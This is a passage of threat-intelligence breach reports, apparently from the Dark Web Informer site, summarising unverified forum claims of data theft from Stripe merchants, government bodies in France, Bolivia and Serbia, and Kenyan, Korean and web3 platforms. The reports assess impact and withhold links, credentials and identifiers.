does not describe a compromise of Stripe itself: the keys are **merchant secrets, and the data was pulled through Stripe's own interface using them**. The seller claims a validation pass confirming which keys remain live, including whether each account can still **take payments and issue payouts**. The exported material is said to contain **1,350,336 unique customer email addresses** from more than six million matches, and a table of **688,000 customers with names, phones, registration dates and IP addresses**. The claim is **unverified**. Severity CRITICAL API keys1,033 Unique emails1.35M Datasets662 ActorSatanic ### ▣Post details TargetStripe merchant accounts CountryMultiple, US, FR, LU seen SectorOnline payments, mixed retail ListingFree, reply to unlock Volume33GB, 662 datasets Root causeClaimed merchant key theft ObservedAug 18, 2026 ActorSatanic ### !Allegedly included - Validated merchant API keys - Merchant account identifiers - Business names and domains - Merchant contact emails - Payment and payout status - Customer names and emails - Customer phone numbers - Registration dates - Customer IP addresses - Charge and refund records - Invoice and subscription data - Payout and transfer logs - Dispute records - Checkout session data ### ◱Screenshots [ ![Stripe merchant API key compromise forum post screenshot, August 2026](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/2798356972863598762569872359871.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/2798356972863598762569872359871.png) [ ![Claimed per merchant export structure listed in the forum post](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/2798356972863598762569872359872.png) Screenshot 2 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/2798356972863598762569872359872.png) ### ⚠Potential impact The **keys matter more than the data**. A merchant secret key is not a record of past activity but a live instrument, and the seller claims to have checked which accounts still accept charges and issue payouts. Any key that has not been rotated would let a holder **read the account continuously, issue refunds, and alter payout arrangements**, so the exposure grows for as long as it goes unnoticed. For consumers, the exported tables reportedly pair **name, email, phone and IP with purchase and subscription history at a named business**, which supports unusually convincing fraud, since an attacker can reference a real order at the correct merchant. Card numbers are not exposed this way, but **disputes, refunds and subscription records are exactly the material a payment support impersonation needs**. The affected merchants are scattered across jurisdictions and many are likely small operators without the means to detect misuse of their own keys. ### iStatus Unverified The framing in the thread title is **misleading and likely to be repeated inaccurately**. Nothing in the post indicates a compromise of Stripe's own systems: the described method is theft of merchant credentials, most often from exposed configuration, repositories or infected developer machines, followed by ordinary use of the payment interface. The export structure shown matches **standard resources any account holder can retrieve with a valid key**, which is consistent with that account and inconsistent with a platform breach. Dark Web Informer is **not reproducing the download route, key fragments, account identifiers, merchant emails or business names** from the samples. The claim is **unverified**, and affected merchants, not Stripe, would be the parties needing to respond. Want everything on this breach? **Paid subscribers** get the full claim details and more. Check out the [threat feed](https://darkwebinformer.com/threat-feed/), then after subscribing, search there for this alert. [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### French Ministry of Education Allegedly Breached, With Staff Directories and Student Monitoring Records Offered for Sale URL: https://darkwebinformer.com/french-ministry-of-education-allegedly-breached-with-staff-directories-and-student-monitoring-records-offered-for-sale/ Last updated: 2026-08-17T21:19:01.000Z Breach Report ![France flag](https://flagcdn.com/w40/fr.png)France Government / Education Selling ## French Ministry of Education Allegedly Breached, With Staff Directories and Student Monitoring Records Offered for Sale A forum user posting as **ZeroBytes** claims to have breached **Éducation Nationale**, the French national education ministry, and is selling what they describe as a partial database totalling **346,178,591 raw lines** across three folders. The actor dates the intrusion to **July 15, 2026**. The material is said to span school system exports, staff exports from 33 academies, and **two LDAP directory dumps containing network accounts and hashed passwords**. Deduplicated, the poster puts the set at **4,350,358 staff identifiers and 1,224,291 students**, and explicitly notes the staff figure spans decades of historical personnel records rather than serving teachers. **No sample has been published**. The claim is **unverified**. Severity HIGH Raw lines346.1M Staff IDs4.35M Students1.22M ActorZeroBytes ### ▣Post details TargetÉducation Nationale Country![France flag](https://flagcdn.com/w40/fr.png)France SectorNational education ministry ListingSelling, partial database Volume346,178,591 raw lines Breach dateStated as July 15, 2026 ObservedAug 17, 2026 ActorZeroBytes ### !Allegedly included - Staff employee identifiers - Personnel records - Retiree and former staff data - Employment convention data - Training and session records - Staff availability data - LDAP network accounts - Hashed account passwords - Two academy directories - Exports from 33 academies - School system exports - Student enrolment data - At risk student monitoring - No sample published ### ◱Screenshot [ ![French Ministry of Education database sale forum post screenshot, August 2026](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/79832598723598723596872359781.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/79832598723598723596872359781.png) ### ⚠Potential impact The **LDAP dumps are the most immediately actionable element**, since directory exports carry network account names and password hashes for two academies, and hashes can be attacked offline at leisure. Any credential still valid would offer a route back into ministry systems rather than merely describing them, which makes this a **continuing access risk and not only a disclosure**. The student side is the more sensitive in human terms: the exports named include systems used to **track pupils identified as struggling or at risk of dropping out**, so the records concern minors and attach a judgement about their circumstances to their identity. On the staff side, a set spanning current employees, support roles, former staff and retirees means **people who left the profession years ago are exposed by an incident they have no relationship with** and will likely never be told about individually. ### iStatus Unverified Evidence in the thread is **thin, with no sample data of any kind**, the poster stating the directory is too large to excerpt and inviting specific requests instead. What supports the claim is its internal specificity: the named systems and academy structures are real and correctly described, and the actor **volunteers a correction against their own headline figure**, noting that 4.35 million staff records reflect decades of history rather than four million serving teachers, when France has roughly 850,000 active. That caution is worth carrying forward, since the raw line count invites far larger claims than the deduplicated numbers support. Dark Web Informer is **not reproducing the off site writeup or the contact routes**. The claim is **unverified** and the ministry has not publicly addressed it. Want everything on this breach? **Paid subscribers** get the full claim details and more. Check out the [threat feed](https://darkwebinformer.com/threat-feed/), then after subscribing, search there for this alert. [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### Bolivian Departmental Government Allegedly Breached, Exposing Food Handler Medical Records and ID Photographs URL: https://darkwebinformer.com/bolivian-departmental-government-allegedly-breached-exposing-food-handler-medical-records-and-id-photographs/ Last updated: 2026-08-17T20:50:04.000Z Breach Report ![Bolivia flag](https://flagcdn.com/w40/bo.png)Bolivia Government / Public Health Free Download ## Bolivian Departmental Government Allegedly Breached, Exposing Food Handler Medical Records and ID Photographs A forum user posting as **konata\_izumi\_shell** claims to have breached **INOCUIDAD**, the food safety and sanitary control system operated by the **Autonomous Departmental Government of Santa Cruz** in Bolivia, and has published the data for free download. The stated volume covers **more than 160,000 food handlers, over 100,000 registered businesses, and more than 150,000 health card photographs**. The published schema is the significant part: alongside national identity numbers, home addresses and dates of birth, the records carry **laboratory screening results for hepatitis, tuberculosis, Chagas disease and sexually transmitted infections**, together with fitness to work determinations. Business records include **tax identifiers and premises coordinates**. The claim is **unverified**. Severity CRITICAL Individuals160,000+ Photographs150,000+ Businesses100,000+ Actorkonata\_izumi\_shell ### ▣Post details TargetINOCUIDAD, Santa Cruz Country![Bolivia flag](https://flagcdn.com/w40/bo.png)Bolivia SectorDepartmental government ListingFree, direct download link VolumeJSON database plus JPG set MethodClaimed system intrusion ObservedAug 17, 2026 Actorkonata\_izumi\_shell ### !Allegedly included - National identity numbers - Full names and birth dates - Home addresses - Phone numbers and emails - Employer and job role - Health card photographs - Hepatitis screening results - Tuberculosis screening results - Chagas disease results - STI screening results - Additional clinical findings - Fitness to work rulings - Treatment notes - Business tax identifiers ### ◱Screenshots [ ![INOCUIDAD Santa Cruz Bolivia government database leak forum post screenshot, August 2026](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/235297835092836587623597814.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/235297835092836587623597814.png) [ ![Claimed dataset headers for food handler and business records in the INOCUIDAD listing](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/235297835092836587623597815.png) Screenshot 2 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/235297835092836587623597815.png) [ ![Business record structure and system description in the INOCUIDAD forum post](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/235297835092836587623597816.png) Screenshot 3 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/235297835092836587623597816.png) ### ⚠Potential impact This is **special category health data on a working population that had no realistic choice about handing it over**, since a sanitary card is a condition of employment in food service. The screening panel is the core problem. Results indicating **hepatitis, tuberculosis, Chagas or a sexually transmitted infection carry stigma and employment consequences that no notification or credit monitoring can undo**, and each result sits in the same record as the person's name, identity number, home address and employer. A fitness to work ruling attached to a named individual is effectively a public statement about their health status. The photographs compound this by making the population **visually identifiable rather than merely listed**, and the business half of the set maps premises with coordinates and tax identifiers. Because the material is posted for free rather than sold, there is **no cost barrier and no realistic prospect of containment**. ### iStatus Unverified The post is more evidenced than most, publishing **full field lists for both datasets alongside structured record samples** whose schema matches the described system, and a contact sheet of health card photographs. That consistency supports the claim without confirming it, and the record counts remain the actor's own figures. The poster describes an **intrusion into government systems rather than a misconfiguration**, so the entry point is unstated and cannot be assessed. Dark Web Informer is **not reproducing the download link, and has redacted the names, identity numbers, addresses, contact details, medical results and faces** appearing in the samples. The claim is **unverified** and the departmental government has not publicly addressed it. Want everything on this breach? **Paid subscribers** get the full claim details and more. Check out the [threat feed](https://darkwebinformer.com/threat-feed/), then after subscribing, search there for this alert. [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### Kenyan Recruitment Platform Snapstartalent Allegedly Dumped With National IDs, Resumes and Recorded Video Interviews URL: https://darkwebinformer.com/kenyan-recruitment-platform-snapstartalent-allegedly-dumped-with-national-ids-resumes-and-recorded-video-interviews/ Last updated: 2026-08-17T16:15:19.000Z Breach Report ![Kenya flag](https://flagcdn.com/w40/ke.png)Kenya Recruitment / Cloud Misconfiguration $2,000 USD ## Kenyan Recruitment Platform Snapstartalent Allegedly Dumped With National IDs, Resumes and Recorded Video Interviews A forum user posting as **exfilar** is offering what they describe as a live extraction of the production backend behind **Snapstartalent.com**, a Kenyan recruitment platform, comprising **176,795 database records and 249GB of downloaded files**. The seller states the Firestore project carried no security rules and that every collection was pulled **without a token**. The claimed contents centre on jobseekers rather than the business: **candidate profiles carrying Kenyan national ID numbers, dates of birth and salary expectations**, tens of thousands of resumes, and **14,965 video interviews containing face recordings**. Records are said to span five years and to include **83 corporate employers** using the platform. The asking price is **$2,000**. The claim is **unverified**. Severity HIGH Records176,795 Files249GB National IDs33,623 Actorexfilar ### ▣Post details TargetSnapstartalent.com Country![Kenya flag](https://flagcdn.com/w40/ke.png)Kenya SectorRecruitment technology ListingSelling, XMR preferred Volume287.3MB database, 249.1GB files Root causeClaimed absent Firestore rules ObservedAug 17, 2026 Actorexfilar ### !Allegedly included - Kenyan national ID numbers - Full names and dates of birth - Phone numbers and emails - Salary expectations - 93,462 candidate profiles - 83,237 job applications - 45,165 resume documents - 14,965 video interviews - Face recordings of candidates - 54,964 profile photographs - Employer tenant records - Recruiter chat messages - Signed file access URLs - Five years of history ### ◱Screenshots [ ![Snapstartalent Kenya recruitment platform database sale forum post screenshot, August 2026](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/89723579862395786297835679235981.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/89723579862395786297835679235981.png) [ ![Claimed format, pricing and stated use cases in the Snapstartalent listing](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/89723579862395786297835679235982.png) Screenshot 2 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/89723579862395786297835679235982.png) ### ⚠Potential impact The harm here falls almost entirely on **jobseekers, who are not the platform's paying customers and have no direct relationship with whoever failed to configure it**. The Kenyan national ID number is the identifier used across banking, mobile money and SIM registration, and pairing it with a name, date of birth and phone number supplies most of what identity verification checks look for. Resumes add employment history and referee contacts, while stated salary expectations let an attacker sort targets by income before ever making contact. The **video interviews are the hardest element to contain**, because a face recording is permanent biometric material that cannot be reissued, and it sits alongside the identity number belonging to the same person. Applications are also said to be organised by employer, which means the set doubles as a **ready-made pretexting kit for targeting named companies** through people who genuinely applied to them. ### iStatus Unverified The collection breakdown is internally consistent and the document counts reconcile against the stated total, but every figure originates with the seller. The listing describes access as **read only, with no indication that records could be modified**, which is narrower than some of this actor's recent claims. The post names 83 employer tenants, including international audit networks, a Kenyan commercial bank and several large retailers and manufacturers, though **their inclusion reflects use of the platform rather than any compromise of those companies**, and none is named here for that reason. Dark Web Informer is **not reproducing the sample links, the contact route, or any identifier from the records**. The claim is **unverified** and neither the platform nor the named employers have publicly addressed it. Want everything on this breach? **Paid subscribers** get the full claim details and more. Check out the [threat feed](https://darkwebinformer.com/threat-feed/), then after subscribing, search there for this alert. [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### Serbian National Health Insurance Databases Allegedly Published Across Multiple File Mirrors URL: https://darkwebinformer.com/serbian-national-health-insurance-databases-allegedly-published-across-multiple-file-mirrors/ Last updated: 2026-08-17T15:51:54.000Z Breach Report ![Serbia flag](https://flagcdn.com/w40/rs.png)Serbia Public Health / Government Mirrored Distribution ## Serbian National Health Insurance Databases Allegedly Published Across Multiple File Mirrors A forum user posting as **bytetobreach** claims to hold databases belonging to **RFZO**, the Republic Fund for Health Insurance of Serbia, and has posted links to the material across **five separate file hosting services**. The poster states the largest tables hold **around 8 million rows**, and estimates roughly **5 million individuals** once duplicates and corrupted records are discounted, a figure approaching the size of the Serbian population. Unusually, the post states that **RFZO was notified directly and that no ransom was demanded**, while also saying the data will not be given to unknown parties. Field level contents are **not itemised** in the post. The claim is **unverified**. Severity HIGH Largest table\~8M rows Est. individuals\~5M Mirrors5 hosts Actorbytetobreach ### ▣Post details TargetRFZO (rfzo.rs) Country![Serbia flag](https://flagcdn.com/w40/rs.png)Serbia SectorState health insurance ListingTagged selling, restricted claim VolumeMultiple databases, \~8M top table DistributionMainstream file hosts ObservedAug 17, 2026 Actorbytetobreach ### !What the post claims - Multiple RFZO databases - Largest tables near 8M rows - Roughly 5M after dedupe - Duplicates and corruption noted - Preview images attached - Five mirror locations - Mainstream cloud hosts used - RFZO notified directly - No ransom demanded - No demand to Serbian state - Withheld from unknown parties - Four contact channels given - Account created Mar 2026 - No field list published ### ◱Screenshot [ ![RFZO Serbia health insurance database leak forum post screenshot, August 2026](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/438756278935987263987235978629382.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/438756278935987263987235978629382.png) ### ⚠Potential impact The post does not enumerate the fields, so what follows rests on the nature of the organisation rather than on published samples. A **state health insurance fund holds identity and entitlement records for essentially the whole insured population**, and the estimate offered would cover a majority of Serbian residents. Even at the least sensitive end, records of that type generally establish who a person is, where they live, and that they are enrolled, which is durable identity data that cannot be reissued the way a password can. Any clinical or entitlement detail would raise this considerably, since **health information carries discrimination and extortion risk that ordinary breach data does not**. The distribution method compounds it: the material is described as sitting on **mainstream consumer file hosts rather than behind a forum paywall**, so takedowns are possible but copies are cheap to make and the poster's stated intent to restrict access is not enforceable once the links circulate. ### iStatus Unverified This post carries **less supporting evidence than usual**. There is no schema, no field coverage table, and no record sample in the thread, only a logo image, mirror links, and preview screenshots. The row counts and the five million figure are the poster's own estimates and are explicitly hedged in the post itself. The stated position is also internally inconsistent, since the thread is tagged as a sale while the text says the data is **not for sale to unknown parties and that no ransom was sought**. Dark Web Informer is **not reproducing the mirror links, the preview image links, or any of the contact routes** given. The claim is **unverified** and RFZO has not publicly addressed it. Want everything on this breach? **Paid subscribers** get the full claim details and more. Check out the [threat feed](https://darkwebinformer.com/threat-feed/), then after subscribing, search there for this alert. [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### Web3 Casino Intraverse Allegedly Exposed by a Keyless Firebase Database, Including Its Own House Bot Stack URL: https://darkwebinformer.com/web3-casino-intraverse-allegedly-exposed-by-a-keyless-firebase-database-including-its-own-house-bot-stack/ Last updated: 2026-08-17T15:24:50.000Z Breach Report Web3 / Jurisdiction Not Stated Online Gambling / Cloud Misconfiguration Free Download ## Web3 Casino Intraverse Allegedly Exposed by a Keyless Firebase Database, Including Its Own House Bot Stack A forum user posting as **exfilar** has published what they describe as the full production Realtime Database behind **intraverse.io**, the Intraverse/Gamifi web3 gambling platform, totalling **16,898,017 database leaves across roughly 518MB of JSON**. The seller states the database required **no authentication, no token, and no referer check**, and that it was located through a bulk sweep of more than twenty thousand Firebase project identifiers rather than a targeted intrusion. Beyond player records, the material reportedly includes the platform's **automated gambling bot configuration, its funding wallets, and a working RPC provider key**. The actor states no private keys or seed phrases are present. The claim is **unverified**. Severity HIGH Records16.9M Wallets2,368 Export size518MB Actorexfilar ### ▣Post details Targetintraverse.io (Intraverse / Gamifi) CountryNot stated in listing SectorWeb3 casino gaming ListingFree, reply to unlock Volume16,898,017 leaves, 518MB Root causeClaimed keyless Firebase RTDB ObservedAug 17, 2026 Actorexfilar ### !Allegedly included - Player wallet addresses - Usernames and win history - Bet and payout amounts - USD denominated values - 16.1M notification events - Client IP references - Push device tokens - Bot orchestration configs - 48 instance wallet records - Manager funding wallets - Live RPC provider key - Discord operator identifiers - Admin account identifiers - Fairness circuit artifacts ### ◱Screenshots [ ![intraverse.io web3 casino Firebase database leak forum post screenshot, August 2026](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/237985697286398762357982359781.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/237985697286398762357982359781.png) [ ![Claimed affected entities and infrastructure map in the Intraverse listing](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/237985697286398762357982359782.png) Screenshot 2 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/237985697286398762357982359782.png) [ ![Dump contents summary and closing remarks in the intraverse.io forum post](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/237985697286398762357982359783.png) Screenshot 3 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/237985697286398762357982359783.png) ### ⚠Potential impact The seller states plainly that **no private keys, seed phrases, or contract paths are present**, so there is no direct route to draining the exposed wallets, and write access to the database was reportedly rejected. What remains is still consequential. Every win record is said to tie a **real wallet address to a username, bet size, payout, and timestamp**, which turns pseudonymous on-chain activity into an attributable gambling history and makes high-value players easy to identify and target for phishing. The **working RPC provider key** is a live third-party credential that can be abused against the account it belongs to until it is revoked. The most awkward exposure is the operator's own: bot configurations, funding wallet balances, and betting parameters would reveal how the house automation is run, which invites both scrutiny of game fairness and adversarial play against a system whose strategy is now public. ### iStatus Unverified The listing includes an access check dated the day of posting showing **read access still open and write attempts refused**, which if accurate means the exposure was live at publication. Counts, balances, and the claimed on-chain reconciliation are the actor's own figures and are not independently confirmed. Dark Web Informer is **not reproducing the download route, the RPC key, wallet addresses, or the Discord and admin identifiers** named in the post. The actor describes this as one of several results from an automated sweep and says further releases will follow, so **other projects with the same misconfiguration are likely in the same queue**. The same account is separately advertising paid intrusion services. The claim is **unverified** and the operator has not publicly addressed it. Want everything on this breach? **Paid subscribers** get the full claim details and more. Check out the [threat feed](https://darkwebinformer.com/threat-feed/), then after subscribing, search there for this alert. [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### Korean Delivery Platform FLY Allegedly Dumped in Full After Backend Left Open to Anonymous Write Access URL: https://darkwebinformer.com/korean-delivery-platform-fly-allegedly-dumped-in-full-after-backend-left-open-to-anonymous-write-access/ Last updated: 2026-08-14T17:33:48.000Z Breach Report ![South Korea flag](https://flagcdn.com/w40/kr.png)South Korea Food Delivery / Cloud Misconfiguration $60,000 USD ## Korean Delivery Platform FLY Allegedly Dumped in Full After Backend Left Open to Anonymous Write Access A forum user posting as **exfilar** is offering what they describe as a complete live extraction of the production backend behind **flyfly.co.kr**, a Korean food-delivery platform, listed at **47.9 million rows across 46.6GB** and priced at **$60,000 in Monero**. The seller states the project's Firebase rules were absent entirely, leaving Firestore and Cloud Storage **readable and writable without authentication**. The claimed contents include **resident registration numbers with plaintext passwords for 11,629 delivery riders**, 6.16 million orders carrying customer GPS coordinates and apartment entry codes, and payment-gateway keys for thousands of restaurants. The listing is dated **hours after the newest records** it contains. The claim is **unverified**. Severity CRITICAL Volume46.6GB Rows47.9M Asking price$60,000 Actorexfilar ### ▣Post details Targetflyfly.co.kr (FLY / 플라이) Country![South Korea flag](https://flagcdn.com/w40/kr.png)South Korea SectorFood delivery logistics ListingSelling, XMR preferred Volume46.6GB, 47.9M rows, JSONL Root causeClaimed absent Firebase rules ObservedAug 14, 2026 Actorexfilar ### !Allegedly included - Resident registration numbers - Plaintext account passwords - Bank names and account numbers - Rider licence numbers - Live rider GPS positions - Customer names and phones - Home addresses to unit level - Building entry codes - Payment gateway API keys - Card terminal credentials - Store owner identity records - Push tokens and device IDs - IP-linked access logs - Delivery proof photographs ### ◱Screenshots [ ![flyfly.co.kr Korean food delivery database sale forum post screenshot, August 2026](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/2379856928765298734682973569872359872541.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/2379856928765298734682973569872359872541.png) [ ![FLY platform orders and notifications collection breakdown in forum listing](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/2379856928765298734682973569872359872542.png) Screenshot 2 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/2379856928765298734682973569872359872542.png) [ ![Claimed sample records and stated use cases in the flyfly.co.kr listing](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/2379856928765298734682973569872359872543.png) Screenshot 3 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/2379856928765298734682973569872359872543.png) [ ![Pricing rationale and market comparison section of the FLY database listing](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/2379856928765298734682973569872359872544.png) Screenshot 4 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/2379856928765298734682973569872359872544.png) ### ⚠Potential impact If the listing is accurate, this is a **near-total exposure of everyone the platform touches**. Riders are worst affected: their records reportedly pair the Korean resident registration number, used for identity verification nationwide, with a plaintext password and a bank account in the same document. Customers appear across **6.16 million orders combining name, phone, address, precise coordinates, and, where delivery instructions were saved, the code that opens the building door**, which carries physical-safety implications well beyond ordinary fraud. The claimed **payment-gateway keys and card terminal credentials** for thousands of restaurants would put transaction infrastructure at risk, not just records about it. Most consequential is the claimed **write access**: a writable backend means records could be altered or payment details redirected, and the exposure stays live until the rules are corrected and every credential is rotated. ### iStatus Unverified The samples are internally consistent with a Firestore export and the field names match the structure of a Korean delivery platform, but consistency is not confirmation and the seller controls everything on display. **Row counts, collection sizes, and pricing are the seller's own figures**, and the valuation section reads as promotional. Dark Web Informer is **not reproducing the sample link, the contact route, or any credential, identifier, or address appearing in the posted records**. The account is recent, joined within the last two months, which is worth weighing against the scale of the claim. The claim is **unverified** and neither the platform operator nor Korean authorities have publicly addressed it. Want everything on this breach? **Paid subscribers** get the full claim details and more. Check out the [threat feed](https://darkwebinformer.com/threat-feed/), then after subscribing, search there for this alert. [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### Ransomware Attack Update - August 13th, 2026 URL: https://darkwebinformer.com/ransomware-attack-update-august-13th-2026/ Last updated: 2026-08-13T22:52:32.000Z ### API Access Authenticated access to threat intelligence, ransomware data, IOC history, and exports. [View API](https://darkwebinformer.com/api-details/) ### Ransomware Feed Browse the latest ransomware victim claims, threat groups, and related activity. [View Feed](https://darkwebinformer.com/ransomware-feed) ### Socials Follow Dark Web Informer across all official platforms. [Follow](https://darkwebinformer.com/socials) --- 12 claims 11 groups 5 countries Ransomware Recap # August 13, 2026 12:01 AM – 11:59 PM UTC 12Claims 11Groups 5Countries AiLockMost Active Group Activity ✕ Count A–Z Expand Collapse \= country not specified No matches found. ### AiLock 2 - DAISEN - Yaomasa ### Coinbase Cartel 1 - Hitachi High-Tech ### Rhysida 1 - SIA Medical Centre ### DragonForce 1 - GB Group S.A ### Qilin 1 - D & J Beverage Service ### Akira 1 - CF Supply ### Payload 1 - Zara Investment Holding ### The Gentlemen 1 - Safeware ### INC Ransom 1 - clgroup ### NightSpire 1 - eas\*\*\*\* ### BlackNevas 1 - Portable Intelligence Inc www.portable-intelligence.com serviced by an IT company Computer... ### Chupin Data Allegedly Leaked in Sixth Release Targeting Tenants of a Shared Business Platform URL: https://darkwebinformer.com/chupin-data-allegedly-leaked-in-sixth-release-targeting-tenants-of-a-shared-business-platform/ Last updated: 2026-08-13T18:29:39.000Z Breach Report ![France flag](https://flagcdn.com/w40/fr.png)France Business Software / Agriculture Free Download ## Chupin Data Allegedly Leaked in Sixth Release Targeting Tenants of a Shared Business Platform A forum user posting as **ChimeraZ** has published what they describe as the database of **Chupin**, a French dealer in agricultural equipment, spare parts, and garden machinery, comprising **16GB across 70,974 files**. The release is labelled as the **sixth in a numbered series**, and identifiers throughout the samples point to a shared business management platform as the common origin rather than six separate company compromises. The material spans **full email content, CRM contact records with addresses and coordinates, and financial documents including invoices**. The actor has publicly named their **next target**, another French equipment retailer, for release the following day. The claim is **unverified**. Severity HIGH Volume16GB Files70,974 SeriesRelease 6 ActorChimeraZ ### ▣Post details TargetChupin Country![France flag](https://flagcdn.com/w40/fr.png)France SectorAgricultural equipment retail ListingFree, reply to unlock Volume16GB, 70,974 files PatternShared platform tenants ObservedAug 13, 2026 ActorChimeraZ ### !Allegedly included - Full email message content - Sender and recipient details - Email attachments - CRM contact records - Business and personal names - Postal addresses - Geographic coordinates - Contact email addresses - Company relationships - Account credentials fields - Banking detail fields - Invoices and PDFs - Document file hashes - Internal reference codes ### ◱Screenshot [ ![Chupin France business platform database leak forum post screenshot, August 2026](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/82378592379865789236598723657982357896234.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/82378592379865789236598723657982357896234.png) ### ⚠Potential impact This is predominantly **business rather than consumer data**, which limits the mass privacy harm, but the composition is unusually complete for a single company. **Full email content exposes commercial terms, pricing, and supplier and customer correspondence**, while the CRM records tie named contacts to addresses with precise coordinates, and the document set includes invoices. Together these support **invoice fraud and business email compromise** against the company and its trading partners, since a fraudulent demand can quote genuine references and correspondence. The more consequential point is structural: the numbering and platform identifiers indicate **other tenants of the same provider face the same exposure**, with releases continuing on a stated schedule. ### iStatus Unverified Samples are published from three distinct systems and are internally consistent with a genuine platform export. **Platform identifiers appear inside records belonging to the named company**, which suggests a single upstream compromise rather than six unrelated ones, though the provider has not been confirmed as the source. Dark Web Informer is **not reproducing the download location or contact route**. The same actor published an unrelated French database weeks earlier. The claim is **unverified** and neither Chupin nor the platform operator has publicly addressed it. Want everything on this breach? **Paid subscribers** get the full claim details and more. Check out the [threat feed](https://darkwebinformer.com/threat-feed/), then after subscribing, search there for this alert. [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### French Cadastral Data Server Allegedly Breached, 2 Million Property Holders Exposed and Access Still Claimed URL: https://darkwebinformer.com/french-cadastral-data-server-allegedly-breached-2-million-property-holders-exposed-and-access-still-claimed/ Last updated: 